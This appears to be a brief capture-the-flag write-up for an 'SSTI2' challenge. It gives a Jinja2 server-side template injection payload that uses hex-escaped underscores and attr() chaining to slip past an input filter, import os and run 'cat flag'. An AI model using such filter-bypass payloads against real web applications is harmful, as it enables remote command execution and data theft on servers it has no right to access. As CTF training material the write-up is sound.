SSTI2
18 May 2025
• 1 min read
I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :)Additional details will be available after launching your challenge instance.
Here We are represented with the same website as the first challenge but here the input is filtered and also by searching the same repo payload we can find a payload that bypasses the filtering and we can read the flag by this command
PYTHON
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}